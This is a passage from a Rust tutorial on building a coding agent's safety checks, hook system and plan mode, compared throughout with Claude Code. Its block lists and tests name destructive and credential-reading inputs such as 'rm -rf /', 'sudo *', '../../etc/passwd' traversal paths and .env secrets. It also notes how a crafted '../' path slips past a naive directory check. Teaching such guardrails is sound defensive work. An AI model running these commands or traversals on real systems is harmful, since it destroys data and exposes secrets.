#![allow(unused)] fn main() { pub fn validate_path(&self, path: &str) -> Result<(), String> { let target = Path::new(path); // Step 1: resolve to absolute path let resolved = if target.is_absolute() { target.to_path_buf() } else { self.raw_dir.join(target) }; // Step 2: canonicalize (resolves symlinks and ..) let canonical = if resolved.exists() { resolved.canonicalize() .map_err(|e| format!("cannot resolve path: {e}"))? } else { // For new files, canonicalize the parent directory let parent = resolved.parent().ok_or("invalid path")?; if parent.exists() { let mut c = parent.canonicalize() .map_err(|e| format!("cannot resolve parent: {e}"))?; if let Some(filename) = resolved.file_name() { c.push(filename); } c } else { return Err(format!("parent directory does not exist: {}", parent.display())); } }; // Step 3: check containment if canonical.starts_with(&self.allowed_dir) { Ok(()) } else { Err(format!("path {} is outside allowed directory {}", canonical.display(), self.allowed_dir.display())) } } }
The key steps:
- Resolve relative paths against
raw_dirto get an absolute path. - Canonicalize the target. If the file exists, canonicalize it directly. If not, canonicalize the parent directory and append the filename. This handles the common case of writing a new file in an existing directory.
- Check
starts_withagainst the canonicalizedallowed_dir.
This is more robust than a simple prefix match because canonicalization resolves .. components and symlinks. A path like /project/../etc/passwd gets resolved to /etc/passwd, which fails the starts_with check against /project.
Protected file pattern matching
The ProtectedFileCheck uses glob::Pattern for matching. For each write or edit call, it extracts the path argument and checks both the full path and just the filename against each pattern:
#![allow(unused)] fn main() { fn check(&self, tool_name: &str, args: &Value) -> Result<(), String> { match tool_name { "write" | "edit" => { if let Some(path) = args.get("path").and_then(|v| v.as_str()) { for pattern in &self.patterns { // Check full path and filename separately if pattern.matches(path) || pattern.matches( Path::new(path).file_name() .unwrap_or_default() .to_str().unwrap_or(""), ) { return Err(format!( "file `{path}` is protected (matches pattern `{}`)", pattern.as_str() )); } } Ok(()) } else { Ok(()) } } _ => Ok(()), } } }
Checking both the full path and the filename is important. A pattern like .env should match /project/.env whether you write the pattern as a full path glob or a simple filename. The glob::Pattern crate handles the actual matching, giving us proper glob semantics including wildcards and character classes.
Command filtering
The CommandFilter::is_blocked method checks a command against blocked glob patterns:
#![allow(unused)] fn main() { pub fn is_blocked(&self, command: &str) -> Option<&str> { // Trim command, check against each pattern, return matching pattern unimplemented!() } }
Unlike the reference implementation which uses substring matching, the starter uses glob::Pattern for command matching. This gives more expressive pattern support -- "sudo *" matches any command starting with sudo followed by arguments, while "rm -rf /*" matches the specific dangerous pattern.
The SafetyCheck implementation only fires for the bash tool:
#![allow(unused)] fn main() { fn check(&self, tool_name: &str, args: &Value) -> Result<(), String> { // Only check 'bash' tool, extract command, call is_blocked unimplemented!() } }
The limitations are similar to any pattern-based approach: it can produce false positives (blocking harmless commands that match a pattern) and false negatives (missing dangerous commands that use different syntax). For a tutorial, pattern matching is the right trade-off -- it demonstrates the architecture without the complexity of shell parsing.
How Claude Code does it
Claude Code's safety checking is considerably more sophisticated, operating at multiple levels:
Command classification with parsing. Rather than substring matching, Claude Code classifies commands using regex patterns combined with shell AST parsing. It understands that rm -rf / and rm -r -f / and command rm -rf / are the same operation. It parses pipes and redirects to check each command in a pipeline separately. Our substring approach is a flat string scan -- no structure, no parsing.
Path normalization and symlink resolution. Claude Code resolves ../, ~, environment variables, and symbolic links before checking paths. A path like $HOME/../../../etc/passwd gets normalized to /etc/passwd before the directory check runs. Our implementation takes paths at face value -- a crafted path with ../ could bypass the allowed directory check.
Git-aware protected paths. Claude Code considers git status when deciding what to protect. An untracked .env file (one that is not in the repository) gets stronger protection than a tracked one -- if it is untracked, it likely contains real secrets that were intentionally excluded from version control. Our implementation treats all .env files the same.
Severity levels. Claude Code distinguishes between operations that should be warned about and operations that should be blocked. Writing to .env might produce a warning that the user can override. Running rm -rf / is an unconditional block. Our Permission::Deny is a single severity -- blocked, no override.
The gap between our implementation and Claude Code's is intentional. Substring matching and prefix-based path checking are easy to reason about and easy to test. They demonstrate the architecture of safety checking -- a separate layer that inspects arguments before the permission engine runs -- without the complexity of shell parsing and path resolution. If you understand how SafetyChecker fits into the pipeline, you understand how Claude Code's safety system fits. The sophistication of the individual checks is an implementation detail.
Where safety checks fit in the pipeline
To see the complete picture, here is how safety checks and the permission engine compose. In the starter, safety checks are embedded inside the tool via SafeToolWrapper. When the SimpleAgent dispatches a tool call:
LLM requests tool call
|
v
PermissionEngine.evaluate(tool_name, args)
|--- Deny? --> block, return error to LLM
|--- Ask? --> prompt user
|--- Allow? --> continue
v
SafeToolWrapper.call(args)
|--- SafetyCheck fails? --> return Ok("error: ...") to LLM
|--- All checks pass? --> continue
v
Inner Tool.call(args)
|
v
Return result to LLM
In this design, the permission engine runs first (deciding whether the tool should run at all), and the safety checks run inside the tool call itself. The SafeToolWrapper catches dangerous arguments even when the permission engine allows the call. The wrapper returns an error string (not an Err) so the LLM sees the rejection reason and can adjust its approach.
This means safety checks are the inner defense layer. Even with allow_all() permission mode, a tool wrapped with SafeToolWrapper will still block writes to .env or commands containing rm -rf /. The safety wrapper is the floor that no permission configuration can lower.
Tests
Run the safety check tests:
cargo test -p mini-claw-code-starter safety
Key tests:
- test_safety_path_within_allowed -- A file inside the allowed directory passes validation.
- test_safety_path_outside_allowed --
/etc/passwdis rejected when the allowed directory is a temp dir. - test_safety_path_traversal_blocked -- A
../../etc/passwdtraversal path is resolved and rejected. - test_safety_path_new_file_in_allowed -- A new (not-yet-existing) file in the allowed directory passes validation.
- test_safety_safety_check_read_tool -- PathValidator fires for the
readtool and validates the path argument. - test_safety_safety_check_ignores_bash -- PathValidator skips the
bashtool (nopathargument to check). - test_safety_command_filter_blocks_rm_rf --
rm -rf /andrm -rf /*are both caught. - test_safety_command_filter_blocks_sudo --
sudo rm filematches thesudo *pattern. - test_safety_command_filter_allows_safe --
ls -la,echo hello, andcargo testpass through. - test_safety_protected_file_blocks_env -- Writes to
.envand.env.localare blocked. - test_safety_protected_file_allows_normal -- Writes to
src/main.rspass through. - test_safety_wrapper_blocks_on_check_failure --
SafeToolWrapperreturns an"error: safety check failed"string when a check fails. - test_safety_wrapper_allows_valid_call --
SafeToolWrapperpasses through to the inner tool when all checks pass. - test_safety_custom_blocked_commands -- Custom blocked patterns (
docker rm *,npm publish*) work correctly.
Key takeaway
Safety checks inspect tool arguments, not tool identity. The permission engine asks "should this tool run at all?" while safety checks ask "is this specific invocation dangerous?" The two layers compose through defense-in-depth: even with all permissions granted, SafeToolWrapper still blocks writes to .env and commands matching rm -rf /.
Recap
The safety system adds a second layer of defense between the LLM and tool execution:
- Trait-based design -- The
SafetyChecktrait allows composable, independent checks.PathValidator,CommandFilter, andProtectedFileCheckeach handle one concern. - Argument-level inspection -- Unlike the permission engine which checks tool identity, safety checks examine the actual arguments: which file is being written, which command is being run.
- SafeToolWrapper -- Wraps any
Box<dyn Tool>with aVec<Box<dyn SafetyCheck>>. ReturnsOk("error: ...")on failure, notErr, so the LLM sees the rejection and can adapt. - Glob-based matching -- Both
CommandFilterandProtectedFileCheckuseglob::Patternfor pattern matching, giving expressive matching without custom code. - Path canonicalization --
PathValidatorcanonicalizes paths before checking, preventing bypass via..components or symlinks. - Defense-in-depth -- Safety checks run inside the tool call. Even with
allow_all()permission mode, wrapped tools still enforce safety rules.
The architecture -- composable checks that inspect arguments and wrap tools -- demonstrates the same defense-in-depth pattern that Claude Code uses.
What's next
In Chapter 15: Hook System you will build pre-tool and post-tool hooks -- shell commands that run before and after tool execution. Hooks let users enforce custom policies beyond what the built-in safety checker covers: run a linter after every edit, block writes to specific directories, log every bash command. Where the safety checker is a built-in guard, hooks are user-defined guards.
Check yourself
← Chapter 13: Permission Engine · Contents · Chapter 15: Hooks →
Chapter 15: Hooks
File(s) to edit:
src/hooks.rsTest to run:cargo test -p mini-claw-code-starter hooksEstimated time: 40 min
The permission engine from Chapter 13 decides whether a tool call runs. The safety checks from Chapter 14 catch dangerous patterns before the user even sees a prompt. But both systems are baked into the agent -- they enforce rules that you, the developer, chose at compile time. What about the user?
Users have policies that the agent author cannot anticipate. A team might require that every bash command is logged to an audit file. A project might enforce that file writes only touch a specific directory. A CI pipeline might need to run a linter after every edit. These are not safety checks in the "prevent rm -rf /" sense -- they are workflow hooks that extend the agent's behavior at runtime.
This chapter builds the hook system. Hooks are event-driven: they fire at key lifecycle points (before a tool call, after a tool call, when the agent starts, when it ends) and they can observe, modify, or block execution. The trait-based design means anyone can implement a hook -- a logging hook for debugging, a blocking hook for policy enforcement, a shell hook that delegates decisions to external commands.
cargo test -p mini-claw-code-starter hooks
Goal
- Define the
HookEventenum with four lifecycle points (AgentStart,PreToolCall,PostToolCall,AgentEnd) that carry contextual data. - Implement the
Hooktrait andHookRegistrydispatch logic whereBlockshort-circuits,ModifyArgsaccumulates, andContinueis the default. - Build three concrete hooks:
LoggingHook(observe all events),BlockingHook(deny specific tools), andShellHook(delegate to external commands). - Ensure hooks compose correctly -- registration order determines priority, and blocking hooks prevent later hooks from running.
The event model
Before writing any code, let's define when hooks fire. The agent loop from Chapter 7 has a clear lifecycle:
User prompt arrives
-> AgentStart
-> Provider returns tool calls
-> PreToolCall (for each tool)
-> Tool executes
-> PostToolCall (for each tool)
-> Provider returns final answer
-> AgentEnd
sequenceDiagram
participant Agent
participant Registry as HookRegistry
participant Tool
Agent->>Registry: dispatch(AgentStart)
loop For each tool call
Agent->>Registry: dispatch(PreToolCall)
alt Block returned
Registry-->>Agent: Block(reason)
Agent->>Agent: Return error to LLM
else Continue/ModifyArgs
Registry-->>Agent: Continue or ModifyArgs
Agent->>Tool: tool.call(args)
Tool-->>Agent: result
Agent->>Registry: dispatch(PostToolCall)
end
end
Agent->>Registry: dispatch(AgentEnd)
Four events, four points where external code can intervene:
| Event | When it fires | What hooks can do |
|---|---|---|
AgentStart | Before the first provider call | Log the prompt, initialize state |
PreToolCall | Before each tool execution | Block the call, modify arguments |
PostToolCall | After each tool execution | Log the result, trigger follow-up actions |
AgentEnd | After the final response | Log the response, clean up state |
The asymmetry is deliberate. PreToolCall can block or modify because the tool has not run yet -- there is still time to intervene. PostToolCall cannot block because the tool already ran -- blocking at this point would be meaningless. It can only observe.
Core types
Open src/hooks.rs. The module defines three types: HookEvent, HookAction, and the Hook trait.
HookEvent
#![allow(unused)] fn main() { #[derive(Debug, Clone)] pub enum HookEvent { PreToolCall { tool_name: String, args: Value, }, PostToolCall { tool_name: String, args: Value, result: String, }, AgentStart { prompt: String, }, AgentEnd { response: String, }, } }
Each variant carries the data relevant to its lifecycle point. PreToolCall carries the tool name and arguments -- everything a hook needs to decide whether to allow or modify the call. PostToolCall adds the result string. AgentStart and AgentEnd carry the user prompt and final response respectively.
The enum derives Clone because the HookRegistry passes events by shared reference (&HookEvent) to each hook in sequence. Hooks that need to store events (like the LoggingHook) clone them. Hooks that only inspect events (like the BlockingHook) borrow without cloning.
HookAction
#![allow(unused)] fn main() { #[derive(Debug, Clone, PartialEq)] pub enum HookAction { Continue, Block(String), ModifyArgs(Value), } }
Three possible responses, ordered by severity:
Continue-- the default. The hook has nothing to say. Execution proceeds normally.Block(reason)-- stop the tool call. The reason string is returned to the LLM as an error message so it can understand why the call was rejected and adjust its approach.ModifyArgs(new_args)-- replace the tool's arguments before execution. This is how hooks can inject defaults, normalize paths, or enforce constraints without blocking the call entirely.
HookAction derives PartialEq so tests can assert on specific actions with assert_eq!. This is purely a testing convenience -- the runtime uses pattern matching, not equality checks.
The Hook trait
#![allow(unused)] fn main() { #[async_trait] pub trait Hook: Send + Sync { async fn on_event(&self, event: &HookEvent) -> HookAction; } }
One method. It receives an event reference and returns an action. The trait requires Send + Sync because hooks live inside the HookRunner and the runner may be shared across async tasks. The async_trait attribute handles the usual ceremony of boxing the returned future.
This is the same pattern as the Tool trait from Chapter 6 -- a single async method that takes structured input and returns structured output. The difference is scope: tools interact with the outside world (filesystem, shell), while hooks interact with the agent's own execution.
The HookRegistry
Individual hooks are useful, but the real value is composing them. The HookRegistry holds a list of hooks and dispatches events to them sequentially.
#![allow(unused)] fn main() { pub struct HookRegistry { hooks: Vec<Box<dyn Hook>>, } impl HookRegistry { pub fn new() -> Self { Self { hooks: Vec::new() } } pub fn register(&mut self, hook: impl Hook + 'static) { self.hooks.push(Box::new(hook)); } pub fn with(mut self, hook: impl Hook + 'static) -> Self { self.register(hook); self } pub fn is_empty(&self) -> bool { self.hooks.is_empty() } } }
The builder API should look familiar -- it mirrors ToolSet from Chapter 4. The with() method takes ownership and returns self for chaining. The register() method takes &mut self for imperative code. Both accept impl Hook + 'static, boxing the concrete type into a trait object.
The dispatch method
The interesting part is how actions compose:
#![allow(unused)] fn main() { pub async fn dispatch(&self, event: &HookEvent) -> HookAction { // Iterate hooks in order // If any hook returns Block, return Block immediately // If any hook returns ModifyArgs, remember the new args // If all hooks return Continue (and no ModifyArgs), return Continue unimplemented!() } }
Three rules:
-
Blockshort-circuits. The moment any hook returnsBlock, the registry stops and returns that action immediately. Later hooks never see the event. This is the right behavior -- if a policy says "no bash," there is no point asking the logging hook for its opinion. -
ModifyArgsaccumulates. If multiple hooks returnModifyArgs, the last one wins. Each hook that modifies arguments overwrites the previous modification. This is simple but effective -- if you need more complex composition (merging argument objects), you can implement it in a single hook that encapsulates the logic. -
Continueis the default. If no hook has an opinion, execution proceeds unchanged. An empty registry always returnsContinue.
The sequential evaluation order means hook priority is determined by registration order. Hooks registered first run first. If you want a blocking hook to take precedence over a logging hook, register it first.
Built-in hooks
The module provides three ready-made hooks. Each demonstrates a different pattern of hook usage.
LoggingHook
#![allow(unused)] fn main() { pub struct LoggingHook { log: std::sync::Mutex<Vec<String>>, } impl LoggingHook { pub fn new() -> Self { Self { log: std::sync::Mutex::new(Vec::new()), } } pub fn messages(&self) -> Vec<String> { self.log.lock().unwrap().clone() } } #[async_trait] impl Hook for LoggingHook { async fn on_event(&self, event: &HookEvent) -> HookAction { // Format as "pre:{tool_name}", "post:{tool_name}", "agent:start", "agent:end" unimplemented!() } } }
The simplest possible hook: record a short description of every event, never interfere. It always returns Continue, meaning it never blocks or modifies anything. The Mutex<Vec<String>> allows interior mutability -- the on_event method takes &self (not &mut self), so we need a lock to push into the vector.
Key Rust concept: Mutex for interior mutability in async code
The Hook trait requires &self (not &mut self) because the registry holds hooks by shared reference. But LoggingHook needs to mutate its internal log. The solution is std::sync::Mutex<Vec<String>> -- a lock that provides mutual exclusion. When on_event calls self.log.lock().unwrap(), it gets exclusive access to the Vec, pushes a message, and drops the lock when the guard goes out of scope.
Why std::sync::Mutex and not tokio::sync::Mutex? Because the lock is held only for a push operation -- microseconds, no .await inside the critical section. The standard library Mutex is faster for short, synchronous critical sections. You only need tokio::sync::Mutex when you must hold the lock across an .await point.
In the starter, the LoggingHook records string descriptions rather than cloned events. The format is compact: "pre:bash", "post:write", "agent:start", "agent:end". This makes test assertions simpler -- you compare strings rather than matching enum variants.
The LoggingHook is invaluable for testing. You can construct a registry with a LoggingHook, fire some events, and then inspect what was recorded. This is exactly what the tests do.
BlockingHook
#![allow(unused)] fn main() { pub struct BlockingHook { blocked_tools: Vec<String>, reason: String, } impl BlockingHook { pub fn new(blocked_tools: Vec<String>, reason: impl Into<String>) -> Self { Self { blocked_tools, reason: reason.into(), } } } #[async_trait] impl Hook for BlockingHook { async fn on_event(&self, event: &HookEvent) -> HookAction { if let HookEvent::PreToolCall { tool_name, .. } = event { if self.blocked_tools.iter().any(|b| b == tool_name) { return HookAction::Block(self.reason.clone()); } } HookAction::Continue } } }
A policy hook: it takes a list of tool names and blocks any PreToolCall event that matches. Everything else -- PostToolCall, AgentStart, AgentEnd, and pre-tool events for tools not on the list -- passes through as Continue.
The pattern match is deliberate. The hook only inspects PreToolCall events. On a PostToolCall for a blocked tool, it does nothing -- the tool has already run and blocking would be meaningless. This is the asymmetry from the event model table above, enforced in code.
You could use BlockingHook to implement workspace-level policies. For example, a read-only project might block write, edit, and bash:
#![allow(unused)] fn main() { let hook = BlockingHook::new( vec!["write".into(), "edit".into(), "bash".into()], "this workspace is read-only", ); }
The LLM would see the block reason in the tool result and switch to read-only tools for the rest of the session.
ShellHook
#![allow(unused)] fn main() { pub struct ShellHook { command: String, tool_pattern: Option<glob::Pattern>, } impl ShellHook { pub fn new(command: impl Into<String>) -> Self { Self { command: command.into(), tool_pattern: None, } } pub fn for_tool(mut self, pattern: &str) -> Self { self.tool_pattern = glob::Pattern::new(pattern).ok(); self } fn matches_tool(&self, tool_name: &str) -> bool { match &self.tool_pattern { Some(pattern) => pattern.matches(tool_name), None => true, } } } }
The ShellHook bridges the gap between Rust code and external commands. Instead of implementing policy in Rust, it delegates to a shell command. The command signals its decision through its exit code.
The for_tool builder method restricts which tools the hook fires for, using a glob pattern. Without it, the hook fires for all tools. ShellHook::new("cargo fmt --check").for_tool("write") only fires when the write tool is called.
The on_event implementation handles PreToolCall and PostToolCall events:
#![allow(unused)] fn main() { #[async_trait] impl Hook for ShellHook { async fn on_event(&self, event: &HookEvent) -> HookAction { // Only handle PreToolCall and PostToolCall events // Check matches_tool() first // Run: tokio::process::Command::new("sh").arg("-c").arg(&self.command).output() // Exit code 0 -> Continue, non-zero -> Block with stderr unimplemented!() } } }
The execution flow:
-
Extract tool name. Only
PreToolCallandPostToolCallevents are handled.AgentStartandAgentEndreturnContinueimmediately. -
Check the tool pattern. If a
tool_patternis set and does not match the tool name, returnContinue. -
Run the command. Uses
tokio::process::Commandto spawnsh -c <command>. -
Interpret the exit code. A non-zero exit means "block this call." The stderr is captured and included in the block reason. A zero exit means
Continue.
Here is a concrete example. Run a linter after every file edit:
#![allow(unused)] fn main() { let hook = ShellHook::new("cargo fmt --check") .for_tool("write"); }
How Claude Code does it
Claude Code's hook system shares the same event-driven architecture but is configured declaratively through settings.json rather than Rust code.
In Claude Code, hooks are defined as JSON objects with matchers and commands:
{
"hooks": {
"PreToolUse": [
{
"matcher": "bash",
"command": "/path/to/check-bash-command.sh"
}
],
"PostToolUse": [
{
"matcher": "*",
"command": "echo 'Tool $TOOL_NAME completed'"
}
]
}
}
The matcher field supports glob patterns against tool names. The command field is a shell command that receives context through environment variables -- the same pattern as our ShellHook. Non-zero exits on pre-tool hooks block the call. Claude Code's hooks can also modify tool arguments by writing JSON to stdout, which the agent parses and applies.
Our trait-based approach provides the same extensibility through a different mechanism. Instead of JSON configuration, hooks are Rust types that implement the Hook trait. This gives us compile-time type safety and the ability to write hooks with complex logic (the BlockingHook matches against a list of tool names; the LoggingHook records structured events). The trade-off is that adding a new hook requires writing Rust code rather than editing a config file.
The ShellHook bridges this gap -- it delegates to external commands just like Claude Code's JSON-configured hooks do. A production agent would likely combine both approaches: built-in hooks for core policies (implemented in Rust) and shell hooks for user-defined customization (configured at runtime).
Tests
Run the hook system tests:
cargo test -p mini-claw-code-starter hooks
Key tests:
- test_hooks_logging_hook -- LoggingHook records
"pre:bash"for a PreToolCall event and returns Continue. - test_hooks_logging_hook_multiple_events -- LoggingHook records all four event types in order:
["agent:start", "pre:read", "post:read", "agent:end"]. - test_hooks_blocking_hook -- BlockingHook returns
Block("bash is disabled")for a bash PreToolCall. - test_hooks_blocking_hook_allows_other_tools -- BlockingHook returns Continue for tools not in the blocked list.
- test_hooks_registry_dispatch_continue -- Registry with only a LoggingHook returns Continue.
- test_hooks_registry_dispatch_block -- Registry with LoggingHook then BlockingHook returns Block for bash.
- test_hooks_registry_multiple_hooks_order -- Both hooks in a two-hook registry are called for a non-blocked event.
- test_hooks_registry_block_short_circuits -- When a BlockingHook fires, hooks registered after it are never called.
- test_hooks_registry_is_empty -- Verifies
is_empty()before and after registration. - test_hooks_post_tool_event -- LoggingHook correctly formats PostToolCall events as
"post:write".
Key takeaway
The hook system is an event bus with three possible responses: observe (Continue), intervene (Block), or transform (ModifyArgs). Registration order determines priority, and Block short-circuits immediately. This gives users a clean extension point for custom policies without modifying the agent's core loop.
Recap
This chapter added an event-driven hook system that lets external code observe, modify, and block agent behavior at runtime:
-
HookEventdefines four lifecycle points:AgentStart,PreToolCall,PostToolCall, andAgentEnd. Each carries the context relevant to its point in the agent loop. -
HookActiondefines three responses:Continue(proceed normally),Block(cancel the tool call with a reason), andModifyArgs(replace the tool arguments). The asymmetry between pre and post events is enforced in the hook implementations -- only pre-tool hooks can meaningfully block. -
HookRegistrydispatches events to hooks sequentially.Blockshort-circuits immediately.ModifyArgsaccumulates (last writer wins).Continueis the default for an empty registry. -
LoggingHookrecords all events in aMutex<Vec<HookEvent>>for debugging and testing. It never interferes with execution. -
BlockingHookblocks specific tools by name onPreToolCallevents. It ignores everything else. -
ShellHookdelegates to an external shell command viatokio::process::Command. Non-zero exits block the call. Thefor_tool()method restricts which tools trigger the command usingglob::Pattern.
The hook system completes the safety and control layer. The permission engine (Chapter 13) enforces mode-based access rules. Safety checks (Chapter 14) catch dangerous patterns statically. Hooks (this chapter) provide the escape hatch for policies that are too specific or too dynamic to hardcode.
What's next
Chapter 16 -- Plan Mode -- ties together everything from Part III. Plan mode is a restricted execution mode where only read-only tools run. The agent can read files, search code, and reason about a task, but it cannot write, edit, or execute commands. The permission engine checks tool categories. Safety checks validate arguments. Hooks fire for observation. But nothing destructive happens. It is the ultimate guardrail: the agent plans, the user reviews, and only then does execution begin.
Check yourself
← Chapter 14: Safety Checks · Contents · Chapter 16: Plan Mode →
Chapter 16: Plan Mode
File(s) to edit:
src/planning.rsTest to run:cargo test -p mini-claw-code-starter planEstimated time: 50 min
Your agent can now read files, write code, run shell commands, and do all of it under a permission system with safety checks and hooks. There is one problem: it does everything at once. The model reads a file, immediately rewrites it, runs the tests, and keeps going -- all in a single uninterrupted loop. If the model misunderstands the task, it has already modified your codebase before you had a chance to say "wait, that is not what I meant."
Plan mode fixes this by splitting the agent loop into two phases. First, the agent analyzes the task using only read-only tools -- reading files, searching code, listing directories. It produces a plan. Then, the caller (you, or your UI) inspects the plan, approves it, and the agent executes with all tools available. Think before you act. It is advice that works for humans and agents alike.
This pattern is not hypothetical. Claude Code ships with a plan mode that
restricts the agent to read-only operations until the user explicitly approves
the plan. Every serious coding agent has some version of this -- a way to let
the model reason about a task before committing to changes. The is_read_only()
flag you set on tools back in Chapter 12 has been waiting for exactly this moment.
cargo test -p mini-claw-code-starter plan
Goal
- Build a
PlanAgentwith two distinct phases:plan()(read-only tools only) andexecute()(all tools available). - Implement the
exit_planvirtual tool that lets the LLM explicitly signal "I am done planning" without requiring aStopReason::Stop. - Enforce two layers of write protection during planning: filter tool definitions so the LLM does not see write tools, and block write tool calls at execution time as a fallback.
- Maintain message continuity between phases so the execution phase has full context from the planning phase.
Why a separate agent?
You could implement plan mode as a flag on SimpleAgent -- add a plan_mode: bool field, check it in execute_tools, filter definitions accordingly. That
works but tangles two concerns. The SimpleAgent is the general-purpose agent
loop. Plan mode is a higher-level workflow with distinct phases, transitions,
and a virtual tool that does not exist in the tool set. Mixing them muddies both.
The PlanAgent is a separate struct that wraps the same building blocks --
a provider, a ToolSet -- but orchestrates them differently.
Two methods, plan() and execute(), implement the two phases. The caller
controls the transition between them. This keeps the SimpleAgent simple and
gives the PlanAgent full control over its workflow.
Claude Code takes a similar approach. Its plan mode sets PermissionMode::Plan,
which the permission engine enforces (only read-only tools pass). The UI shows
a "Plan Mode" banner and the agent's plan before asking for approval. Our
PlanAgent encapsulates the same two-phase pattern with caller-driven approval.
The PlanAgent struct
#![allow(unused)] fn main() { use std::collections::HashSet; use tokio::sync::mpsc; use crate::agent::{AgentEvent, tool_summary}; use crate::streaming::{StreamEvent, StreamProvider}; use crate::types::*; pub struct PlanAgent<P: StreamProvider> { provider: P, tools: ToolSet, read_only: HashSet<&'static str>, plan_system_prompt: String, exit_plan_def: ToolDefinition, } }
Five fields, each with a clear role:
provider-- The LLM backend. Note theStreamProviderbound -- thePlanAgentuses streaming internally for the plan/execute loop.tools-- The full tool set. During planning, only a subset is exposed. During execution, all tools are available.read_only-- An explicit set of tool names allowed during planning. Only the listed tools are available during the plan phase.plan_system_prompt-- The system prompt injected during planning. A default is provided via theDEFAULT_PLAN_PROMPTconstant.exit_plan_def-- TheToolDefinitionfor the virtualexit_plantool. This tool is injected into the plan phase's tool list but does not exist in theToolSet. It is a signal, not a real tool.
The builder
The builder follows the same new() + chaining pattern as SimpleAgent.
The new() constructor creates the exit_plan_def with a description that
tells the model what it does. This definition has no parameters -- the model
just calls it to signal "I am done planning."
#![allow(unused)] fn main() { let agent = PlanAgent::new(provider) .tool(ReadTool::new()) .tool(WriteTool::new()) .read_only(&["read"]) .plan_prompt("You are a security auditor."); }
Two builder methods are specific to PlanAgent:
-
read_only(&[&'static str])-- Sets the tool names allowed during planning. If you call.read_only(&["bash", "read"]), onlybashandreadare available during planning. This is useful for specialized workflows where you want the agent to run commands (likegit logorcargo test --dry-run) during analysis. -
plan_prompt(impl Into<String>)-- Replaces the default planning system prompt. The default says "You are in PLANNING MODE. Explore the codebase using the available tools and create a plan." A custom prompt can focus the agent on a specific concern: security auditing, performance analysis, migration planning.
The two phases
The core of PlanAgent is two methods: plan() and execute(). They share
the same loop structure as the SimpleAgent's chat(), but with different tool
sets and different termination conditions. Both methods also take an
mpsc::UnboundedSender<AgentEvent> for streaming events back to the caller.
flowchart LR
A["User prompt"] --> B["plan()<br/>read-only tools<br/>+ exit_plan"]
B --> C["Plan text"]
C --> D{"Caller<br/>approves?"}
D -->|Yes| E["Push approval<br/>message"]
D -->|No| F["Push feedback<br/>message"]
F --> B
E --> G["execute()<br/>all tools"]
G --> H["Final result"]
The caller drives the transition. After plan() returns, the caller can:
- Show the plan to the user
- Push a
Message::user("Approved. Go ahead.")into the message history - Call
execute()with the same message vec
Or the caller can reject the plan, push feedback, and call plan() again.
The PlanAgent does not care -- it has no built-in UI, no approval dialog.
It is a workflow agent, not a user interface.
Phase 1: plan()
The planning phase runs a restricted agent loop. Only read-only tools and the
virtual exit_plan tool are available. Both plan() and execute() delegate
to a shared run_loop() method:
#![allow(unused)] fn main() { pub async fn plan( &self, messages: &mut Vec<Message>, events: mpsc::UnboundedSender<AgentEvent>, ) -> anyhow::Result<String> { // Inject system prompt if needed // Call run_loop with Some(&self.read_only) unimplemented!() } pub async fn execute( &self, messages: &mut Vec<Message>, events: mpsc::UnboundedSender<AgentEvent>, ) -> anyhow::Result<String> { // Call run_loop with None (no restrictions) unimplemented!() } }
The run_loop() method is the shared agent loop. When allowed is Some,
only those tools plus exit_plan are permitted. When allowed is None,
all tools are available:
Here is the full implementation of run_loop:
#![allow(unused)] fn main() { async fn run_loop( &self, messages: &mut Vec<Message>, allowed: Option<&HashSet<&'static str>>, events: mpsc::UnboundedSender<AgentEvent>, ) -> anyhow::Result<String> { // Step 1: filter tool definitions let all_defs = self.tools.definitions(); let defs: Vec<&ToolDefinition> = match allowed { Some(names) => { let mut filtered: Vec<&ToolDefinition> = all_defs .into_iter() .filter(|d| names.contains(d.name)) .collect(); filtered.push(&self.exit_plan_def); filtered } None => all_defs, }; loop { // Step 2: stream the LLM response (forward text deltas to UI) let (stream_tx, mut stream_rx) = mpsc::unbounded_channel(); let events_clone = events.clone(); let forwarder = tokio::spawn(async move { while let Some(event) = stream_rx.recv().await { if let StreamEvent::TextDelta(ref text) = event { let _ = events_clone.send(AgentEvent::TextDelta(text.clone())); } } }); let turn = self.provider.stream_chat(messages, &defs, stream_tx).await?; let _ = forwarder.await; // Step 3: match on stop reason match turn.stop_reason { StopReason::Stop => { let text = turn.text.clone().unwrap_or_default(); let _ = events.send(AgentEvent::Done(text.clone())); messages.push(Message::Assistant(turn)); return Ok(text); } StopReason::ToolUse => { let mut results = Vec::with_capacity(turn.tool_calls.len()); for call in &turn.tool_calls { // Handle exit_plan if allowed.is_some() && call.name == "exit_plan" { let text = turn.text.clone().unwrap_or_default(); let _ = events.send(AgentEvent::Done(text.clone())); messages.push(Message::Assistant(turn)); messages.push(Message::ToolResult { id: call.id.clone(), content: "Plan submitted for review.".into(), }); return Ok(text); } // Block tools not in allowed set if let Some(names) = allowed { if !names.contains(call.name.as_str()) { results.push(( call.id.clone(), format!("error: tool `{}` is not available in planning mode", call.name), )); continue; } } // Execute allowed tools let content = match self.tools.get(&call.name) { Some(t) => t.call(call.arguments.clone()).await .unwrap_or_else(|e| format!("error: {e}")), None => format!("error: unknown tool `{}`", call.name), }; results.push((call.id.clone(), content)); } messages.push(Message::Assistant(turn)); for (id, content) in results { messages.push(Message::ToolResult { id, content }); } } } } } }
The structure mirrors the SimpleAgent's chat loop. Same loop, same provider
call, same stop-reason match. But the PlanAgent uses streaming internally
via StreamProvider, and three things are different:
1. System prompt injection
Before entering the loop, plan() injects the planning system prompt at
position 0 of the message history (if not already present), telling the model
it is in planning mode.
2. Filtered tool definitions
The plan phase filters tool definitions to only include tools in the
read_only set, plus the exit_plan tool. The model cannot see write tools
in its schema, so it has no reason to call them.
3. The exit_plan escape hatch
When the model calls exit_plan, the plan phase ends immediately. The loop
pushes the assistant message and a synthetic tool result ("Plan submitted for review.")
into the history, then returns. The synthetic result is necessary because the
API requires every tool call to have a corresponding result -- without it, the
next provider call would fail.
The plan phase can end in two ways:
StopReason::Stop-- The model produces a text response directly. This is the implicit exit.exit_plantool call -- The model explicitly signals it is done analyzing. This is the explicit exit.
Both return the plan text (which may be empty if the model put its plan in tool calls rather than text).
The exit_plan tool
The exit_plan tool deserves its own section because it is unusual. It is not
a real tool. It does not exist in the ToolSet. It has no call() method. It
is a ToolDefinition with a name and description, injected into the plan
phase's tool list so the model sees it as an option.
Why not just rely on StopReason::Stop? In principle you could: tell the
model "when you are done planning, emit your plan as plain text and stop."
In practice this fights against two behaviours baked into most instruction-tuned
models.
- When tools are visible, models keep using them. Present a model with
